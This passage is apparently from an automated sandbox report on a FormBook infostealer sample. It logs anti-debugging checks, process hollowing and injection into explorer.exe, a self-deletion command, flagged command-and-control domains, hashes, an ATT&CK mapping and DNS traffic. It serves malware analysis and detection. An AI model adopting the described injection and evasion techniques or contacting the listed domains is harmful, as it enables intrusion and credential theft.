          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B21DB5 mov eax, dword ptr fs:[00000030h]11_2_02B21DB5
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02BC05AC mov eax, dword ptr fs:[00000030h]11_2_02BC05AC
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02BC05AC mov eax, dword ptr fs:[00000030h]11_2_02BC05AC
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B235A1 mov eax, dword ptr fs:[00000030h]11_2_02B235A1
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02AF2D8A mov eax, dword ptr fs:[00000030h]11_2_02AF2D8A
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02AF2D8A mov eax, dword ptr fs:[00000030h]11_2_02AF2D8A
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02AF2D8A mov eax, dword ptr fs:[00000030h]11_2_02AF2D8A
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02AF2D8A mov eax, dword ptr fs:[00000030h]11_2_02AF2D8A
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02AF2D8A mov eax, dword ptr fs:[00000030h]11_2_02AF2D8A
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B2FD9B mov eax, dword ptr fs:[00000030h]11_2_02B2FD9B
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B2FD9B mov eax, dword ptr fs:[00000030h]11_2_02B2FD9B
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B22581 mov eax, dword ptr fs:[00000030h]11_2_02B22581
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B22581 mov eax, dword ptr fs:[00000030h]11_2_02B22581
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B22581 mov eax, dword ptr fs:[00000030h]11_2_02B22581
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B22581 mov eax, dword ptr fs:[00000030h]11_2_02B22581
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02BA8DF1 mov eax, dword ptr fs:[00000030h]11_2_02BA8DF1
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B0D5E0 mov eax, dword ptr fs:[00000030h]11_2_02B0D5E0
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B0D5E0 mov eax, dword ptr fs:[00000030h]11_2_02B0D5E0
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02BBFDE2 mov eax, dword ptr fs:[00000030h]11_2_02BBFDE2
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02BBFDE2 mov eax, dword ptr fs:[00000030h]11_2_02BBFDE2
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02BBFDE2 mov eax, dword ptr fs:[00000030h]11_2_02BBFDE2
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02BBFDE2 mov eax, dword ptr fs:[00000030h]11_2_02BBFDE2
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B76DC9 mov eax, dword ptr fs:[00000030h]11_2_02B76DC9
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B76DC9 mov eax, dword ptr fs:[00000030h]11_2_02B76DC9
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B76DC9 mov eax, dword ptr fs:[00000030h]11_2_02B76DC9
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B76DC9 mov ecx, dword ptr fs:[00000030h]11_2_02B76DC9
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B76DC9 mov eax, dword ptr fs:[00000030h]11_2_02B76DC9
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B76DC9 mov eax, dword ptr fs:[00000030h]11_2_02B76DC9
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B7A537 mov eax, dword ptr fs:[00000030h]11_2_02B7A537
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02BBE539 mov eax, dword ptr fs:[00000030h]11_2_02BBE539
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B03D34 mov eax, dword ptr fs:[00000030h]11_2_02B03D34
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B03D34 mov eax, dword ptr fs:[00000030h]11_2_02B03D34
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B03D34 mov eax, dword ptr fs:[00000030h]11_2_02B03D34
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B03D34 mov eax, dword ptr fs:[00000030h]11_2_02B03D34
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B03D34 mov eax, dword ptr fs:[00000030h]11_2_02B03D34
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B03D34 mov eax, dword ptr fs:[00000030h]11_2_02B03D34
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B03D34 mov eax, dword ptr fs:[00000030h]11_2_02B03D34
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B03D34 mov eax, dword ptr fs:[00000030h]11_2_02B03D34
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B03D34 mov eax, dword ptr fs:[00000030h]11_2_02B03D34
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B03D34 mov eax, dword ptr fs:[00000030h]11_2_02B03D34
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B03D34 mov eax, dword ptr fs:[00000030h]11_2_02B03D34
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B03D34 mov eax, dword ptr fs:[00000030h]11_2_02B03D34
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B03D34 mov eax, dword ptr fs:[00000030h]11_2_02B03D34
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02BC8D34 mov eax, dword ptr fs:[00000030h]11_2_02BC8D34
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B24D3B mov eax, dword ptr fs:[00000030h]11_2_02B24D3B
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B24D3B mov eax, dword ptr fs:[00000030h]11_2_02B24D3B
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B24D3B mov eax, dword ptr fs:[00000030h]11_2_02B24D3B
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02AFAD30 mov eax, dword ptr fs:[00000030h]11_2_02AFAD30
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B1C577 mov eax, dword ptr fs:[00000030h]11_2_02B1C577
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B1C577 mov eax, dword ptr fs:[00000030h]11_2_02B1C577
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B17D50 mov eax, dword ptr fs:[00000030h]11_2_02B17D50
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B33D43 mov eax, dword ptr fs:[00000030h]11_2_02B33D43
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B73540 mov eax, dword ptr fs:[00000030h]11_2_02B73540
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02BA3D40 mov eax, dword ptr fs:[00000030h]11_2_02BA3D40
          Source: C:\Users\user\Desktop\VJaX7U6LAp.exe | Process queried: DebugPort
          Source: C:\Windows\SysWOW64\help.exe | Process queried: DebugPort
          Source: C:\Users\user\Desktop\VJaX7U6LAp.exe | Code function: 4_2_0040ACC0 LdrLoadDll
          Source: C:\Users\user\Desktop\VJaX7U6LAp.exe | Memory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exe | Domain query: www.usauber.com
          Source: C:\Windows\explorer.exe | Domain query: www.vrchance.com
          Source: C:\Windows\explorer.exe | Domain query: www.sunnytheodora.com
          Sample uses process hollowing technique
          Source: C:\Users\user\Desktop\VJaX7U6LAp.exe | Section unmapped: C:\Windows\SysWOW64\help.exe base address: AC0000
          Maps a DLL or memory area into another process
          Source: C:\Users\user\Desktop\VJaX7U6LAp.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\VJaX7U6LAp.exe | Section loaded: unknown target: C:\Windows\SysWOW64\help.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\VJaX7U6LAp.exe | Section loaded: unknown target: C:\Windows\SysWOW64\help.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\help.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\help.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Injects a PE file into a foreign processes
          Source: C:\Users\user\Desktop\VJaX7U6LAp.exe | Memory written: C:\Users\user\Desktop\VJaX7U6LAp.exe base: 400000 value starts with: 4D5A
          Queues an APC in another process (thread injection)
          Source: C:\Users\user\Desktop\VJaX7U6LAp.exe | Thread APC queued: target process: C:\Windows\explorer.exe
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\Desktop\VJaX7U6LAp.exe | Thread register set: target process: 3440
          Source: C:\Windows\SysWOW64\help.exe | Thread register set: target process: 3440
          Source: C:\Users\user\Desktop\VJaX7U6LAp.exe | Process created: C:\Users\user\Desktop\VJaX7U6LAp.exe C:\Users\user\Desktop\VJaX7U6LAp.exe
          Source: C:\Users\user\Desktop\VJaX7U6LAp.exe | Process created: C:\Users\user\Desktop\VJaX7U6LAp.exe C:\Users\user\Desktop\VJaX7U6LAp.exe
          Source: C:\Windows\SysWOW64\help.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\VJaX7U6LAp.exe'
          Source: explorer.exe, 00000006.00000000.389356128.0000000004F80000.00000004.00000001.sdmp, help.exe, 0000000B.00000002.622677188.0000000004000000.00000002.00020000.sdmp | Binary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000006.00000000.399710290.00000000008B8000.00000004.00000020.sdmp, help.exe, 0000000B.00000002.622677188.0000000004000000.00000002.00020000.sdmp | Binary or memory string: Progman
          Source: explorer.exe, 00000006.00000000.400222280.0000000000EE0000.00000002.00020000.sdmp, help.exe, 0000000B.00000002.622677188.0000000004000000.00000002.00020000.sdmp | Binary or memory string: &Program Manager
          Source: explorer.exe, 00000006.00000000.400222280.0000000000EE0000.00000002.00020000.sdmp, help.exe, 0000000B.00000002.622677188.0000000004000000.00000002.00020000.sdmp | Binary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\VJaX7U6LAp.exe | Queries volume information: C:\Users\user\Desktop\VJaX7U6LAp.exe VolumeInformation
          Source: C:\Users\user\Desktop\VJaX7U6LAp.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\Desktop\VJaX7U6LAp.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\Desktop\VJaX7U6LAp.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Users\user\Desktop\VJaX7U6LAp.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Users\user\Desktop\VJaX7U6LAp.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          Yara detected FormBook

          Remote Access Functionality:

          Yara detected FormBook

          Mitre Att&ck Matrix

          Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
          Valid Accounts | Shared Modules 1 | Path Interception | Process Injection 612 | Rootkit 1 | Credential API Hooking 1 | Security Software Discovery 221 | Remote Services | Credential API Hooking 1 | Exfiltration Over Other Network Medium | Encrypted Channel 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
          Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Masquerading 1 | Input Capture 1 | Process Discovery 2 | Remote Desktop Protocol | Input Capture 1 | Exfiltration Over Bluetooth | Non-Application Layer Protocol 1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
          Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Disable or Modify Tools 1 | Security Account Manager | Virtualization/Sandbox Evasion 31 | SMB/Windows Admin Shares | Archive Collected Data 1 | Automated Exfiltration | Application Layer Protocol 11 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
          Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Virtualization/Sandbox Evasion 31 | NTDS | Remote System Discovery 1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Protocol Impersonation | SIM Card Swap | | Carrier Billing Fraud
          Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Process Injection 612 | LSA Secrets | System Information Discovery 112 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
          Replication Through Removable Media | Launchd | Rc.common | Rc.common | Deobfuscate/Decode Files or Information 1 | Cached Domain Credentials | System Owner/User Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
          External Remote Services | Scheduled Task | Startup Items | Startup Items | Obfuscated Files or Information 3 | DCSync | Network Sniffing | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
          Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Software Packing 11 | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue
          Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | File Deletion 1 | /etc/passwd and /etc/shadow | System Network Connections Discovery | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | | Data Destruction

          Behavior Graph

          [Figure: behavior graph, ID 510423, sample VJaX7U6LAp.exe, start date 27/10/2021, architecture WINDOWS, score 100. Process chain: VJaX7U6LAp.exe starts two VJaX7U6LAp.exe child processes; one is injected into explorer.exe, which starts help.exe, which starts cmd.exe, which starts conhost.exe.]

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          Source | Detection | Scanner | Label | Link
          VJaX7U6LAp.exe | 10% | Virustotal | | Browse

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          Source | Detection | Scanner | Label | Link | Download
          4.2.VJaX7U6LAp.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen | | Download File
          4.0.VJaX7U6LAp.exe.400000.8.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen | | Download File
          4.0.VJaX7U6LAp.exe.400000.6.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen | | Download File
          4.0.VJaX7U6LAp.exe.400000.4.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen | | Download File

          Domains

          No Antivirus matches

          URLs

          Source | Detection | Scanner | Label | Link
          http://www.collada.org/2005/11/COLLADASchema9Done | 0% | URL Reputation | safe |
          www.zahnimplantatangebotede.com/mxwf/ | 0% | Avira URL Cloud | safe |

          Domains and IPs

          Contacted Domains

          Name | IP | Active | Malicious | Antivirus Detection | Reputation
          cname.landingi.com | 54.77.19.84 | true | false | | high
          www.usauber.com | unknown | unknown | true | | unknown
          www.marciaroyal.com | unknown | unknown | true | | unknown
          www.vrchance.com | unknown | unknown | true | | unknown
          www.sunnytheodora.com | unknown | unknown | true | | unknown

          Contacted URLs

          Name | Malicious | Antivirus Detection | Reputation
          www.zahnimplantatangebotede.com/mxwf/ | true | Avira URL Cloud: safe | low

          URLs from Memory and Binaries

          Name | Source | Malicious | Antivirus Detection | Reputation
          http://www.autoitscript.com/autoit3/J | explorer.exe, 00000006.00000000.399795242.000000000095C000.00000004.00000020.sdmp | false | | high
          http://www.collada.org/2005/11/COLLADASchema9Done | VJaX7U6LAp.exe, 00000000.00000002.362570337.0000000002651000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown

          Contacted IPs

          No contacted IP infos

          General Information

          Joe Sandbox Version: 33.0.0 White Diamond
          Analysis ID: 510423
          Start date: 27.10.2021
          Start time: 19:32:36
          Joe Sandbox Product: CloudBasic
          Overall analysis duration: 0h 11m 2s
          Hypervisor based Inspection enabled: false
          Report type: full
          Sample file name: VJaX7U6LAp.exe
          Cookbook file name: default.jbs
          Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
          Number of analysed new started processes analysed: 25
          Number of new started drivers analysed: 0
          Number of existing processes analysed: 0
          Number of existing drivers analysed: 0
          Number of injected processes analysed: 1
          Technologies:
          • HCA enabled
          • EGA enabled
          • HDC enabled
          • AMSI enabled
          Analysis Mode: default
          Analysis stop reason: Timeout
          Detection: MAL
          Classification: mal100.troj.evad.winEXE@9/1@4/0
          EGA Information: Failed
          HDC Information:
          • Successful, ratio: 33.9% (good quality ratio 31.7%)
          • Quality average: 72.1%
          • Quality standard deviation: 30.7%
          HCA Information:
          • Successful, ratio: 96%
          • Number of executed functions: 76
          • Number of non-executed functions: 134
          Cookbook Comments:
          • Adjust boot time
          • Enable AMSI
          • Found application associated with file extension: .exe
          Warnings:
          • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
          • Excluded IPs from analysis (whitelisted): 52.182.143.212, 20.189.173.20, 23.211.6.115, 20.189.173.22, 104.208.16.94, 13.89.179.12, 20.82.210.154, 209.197.3.8, 20.54.110.249, 52.251.79.25, 40.112.88.60, 80.67.82.242, 80.67.82.235, 23.211.4.86, 20.50.102.62
          • Excluded domains from analysis (whitelisted): onedsblobprdwus17.westus.cloudapp.azure.com, consumer-displaycatalogrp-aks2aks-useast.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, onedsblobprdcus17.centralus.cloudapp.azure.com, a1449.dscg2.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, e12564.dspb.akamaiedge.net, onedsblobprdcus15.centralus.cloudapp.azure.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, onedsblobprdcus16.centralus.cloudapp.azure.com, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu-shim.trafficmanager.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, onedsblobprdwus15.westus.cloudapp.azure.com, eus2-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, asf-ris-prod-neu.northeurope.cloudapp.azure.com, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, cds.d2s7q6s2.hwcdn.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, ris.api.iris.microsoft.com, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, displaycatalog-rp-useast.md.mp.microsoft.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
          • Not all processes were analyzed, report is missing behavior information

                      Simulations

                      Behavior and APIs

                      Time | Type | Description
                      19:33:37 | API Interceptor | 1x Sleep call for process: VJaX7U6LAp.exe modified

                      Joe Sandbox View / Context

                      IPs

                      No context

                      Domains

                      Match: cname.landingi.com

                      Associated Sample Name / URL | Detection | Context
                      SDL_Order Onay#U0131 _ Acil,pdf.exe | malicious | 54.77.19.84
                      DF_Nueva orden _WJO-001,pdf.exe | malicious | 108.128.238.226
                      Yeni Sipari#U015f #86-55113,pdf.exe | malicious | 52.212.68.12
                      ny5QHKcgLH.exe | malicious | 108.128.238.226
                      IMG16092021.exe | malicious | 52.212.68.12
                      ORDER CONFIRMATION.xlsx | malicious | 52.212.68.12
                      0OBKA8AwTn.exe | malicious | 54.77.19.84
                      ZbpMqzUXVN.exe | malicious | 108.128.238.226
                      PO_IMG_13072021_item.exe | malicious | 52.212.68.12
                      47mAsp9IER.exe | malicious | 54.77.19.84
                      U03c2doc.exe | malicious | 108.128.238.226
                      scan-copy059950059pdf.exe | malicious | 108.128.238.226
                      SKMBT_C224307532DL23457845_Product Order doc.exe | malicious | 108.128.238.226
                      Descripciones de oferta de productos MACIILIAS SRL doc.exe | malicious | 54.77.19.84
                      a449cc12_by_Libranalysis.exe | malicious | 52.212.68.12
                      Dokument Nota odbiorcza IMI FFPT-2019223912003_2021 doc.exe | malicious | 108.128.238.226
                      Documento de transfer#U00eancia banc#U00e1ria _2021doc.exe | malicious | 52.212.68.12
                      TSVINCCU21021642.exe | malicious | 52.212.68.12
                      SWIFT COPY.exe | malicious | 54.77.19.84
                      SWIFT COPY.exe | malicious | 54.77.19.84

                      ASN

                      No context

                      JA3 Fingerprints

                      No context

                      Dropped Files

                      No context

                      Created / dropped Files

                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\VJaX7U6LAp.exe.log
                      Process:C:\Users\user\Desktop\VJaX7U6LAp.exe
                      File Type:ASCII text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):1216
                      Entropy (8bit):5.355304211458859
                      Encrypted:false
                      SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzr
                      MD5:FED34146BF2F2FA59DCF8702FCC8232E
                      SHA1:B03BFEA175989D989850CF06FE5E7BBF56EAA00A
                      SHA-256:123BE4E3590609A008E85501243AF5BC53FA0C26C82A92881B8879524F8C0D5C
                      SHA-512:1CC89F2ED1DBD70628FA1DC41A32BA0BFA3E81EAE1A1CF3C5F6A48F2DA0BF1F21A5001B8A18B04043C5B8FE4FBE663068D86AA8C4BD8E17933F75687C3178FF6
                      Malicious:true
                      Reputation:high, very likely benign file
                      Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21

                      Static File Info

                      General

                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                      Entropy (8bit):6.687486048595242
                      TrID:
                      • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                      • Win32 Executable (generic) a (10002005/4) 49.75%
                      • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                      • Windows Screen Saver (13104/52) 0.07%
                      • Generic Win/DOS Executable (2004/3) 0.01%
                      File name:VJaX7U6LAp.exe
                      File size:520192
                      MD5:15a4b8c6607b8e67b0bba2d1b5dbd43e
                      SHA1:c77c0417b07c25c0e567f0d0362a8a80fc7c40e9
                      SHA256:c4b1789371d832969f812bd0a577e380cdac00db6775d7fc251adf8d92c15d74
                      SHA512:b168504f30e0714a8d2ec0eb79a9d49b5c1f84399ac0ee091fe9b4983e9ed77b9fd70398a6c2644b3295f777d3d9b84422f76897e722df579a1ef1dd66d8704c
                      SSDEEP:12288:IaNilVYYYGC3tsZ1isByVk2t0iWbtY36yhPhQ:bNilBYui7m2t0iWY6yh
                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..._.ya..............0.............J.... ... ....@.. .......................`............@................................

                      File Icon

                      Icon Hash:00828e8e8686b000

                      Static PE Info

                      General

                      Entrypoint:0x48054a
                      Entrypoint Section:.text
                      Digitally signed:false
                      Imagebase:0x400000
                      Subsystem:windows gui
                      Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                      DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                      Time Stamp:0x6179805F [Wed Oct 27 16:37:51 2021 UTC]
                      TLS Callbacks:
                      CLR (.Net) Version:v4.0.30319
                      OS Version Major:4
                      OS Version Minor:0
                      File Version Major:4
                      File Version Minor:0
                      Subsystem Version Major:4
                      Subsystem Version Minor:0
                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                      Entrypoint Preview

                      Instruction
                      jmp dword ptr [00402000h]
                      add byte ptr [eax], al

                      Data Directories

                      Name | Virtual Address | Virtual Size | Is in Section
                      IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_IMPORT | 0x804f8 | 0x4f | .text
                      IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x82000 | 0x5c4 | .rsrc
                      IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x84000 | 0xc | .reloc
                      IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
                      IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                      Sections

                      Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                      .text | 0x2000 | 0x7e550 | 0x7e600 | False | 0.685342096316 | data | 6.69788098244 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      .rsrc | 0x82000 | 0x5c4 | 0x600 | False | 0.430989583333 | data | 4.15472453477 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                      .reloc | 0x84000 | 0xc | 0x200 | False | 0.044921875 | data | 0.0815394123432 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                      Resources

                      Name | RVA | Size | Type | Language | Country
                      RT_VERSION | 0x82090 | 0x334 | data | |
                      RT_MANIFEST | 0x823d4 | 0x1ea | XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators | |

                      Imports

                      DLL | Import
                      mscoree.dll | _CorExeMain

                      Version Infos

                      Description | Data
                      Translation | 0x0000 0x04b0
                      LegalCopyright | Delchamps 2015
                      Assembly Version | 7.3.0.0
                      InternalName | SharedI.exe
                      FileVersion | 7.3.0.0
                      CompanyName | Delchamps
                      LegalTrademarks |
                      Comments |
                      ProductName | Platformer_AI
                      ProductVersion | 7.3.0.0
                      FileDescription | Platformer_AI
                      OriginalFilename | SharedI.exe

                      Network Behavior

                      Network Port Distribution

                      UDP Packets

                      Timestamp | Source Port | Dest Port | Source IP | Dest IP
                      Oct 27, 2021 19:34:47.814812899 CEST | 60778 | 53 | 192.168.2.6 | 8.8.8.8
                      Oct 27, 2021 19:34:47.836822033 CEST | 53 | 60778 | 8.8.8.8 | 192.168.2.6
                      Oct 27, 2021 19:35:04.025022030 CEST | 59329 | 53 | 192.168.2.6 | 8.8.8.8
                      Oct 27, 2021 19:35:04.055140972 CEST | 53 | 59329 | 8.8.8.8 | 192.168.2.6
                      Oct 27, 2021 19:35:24.880810976 CEST | 64021 | 53 | 192.168.2.6 | 8.8.8.8
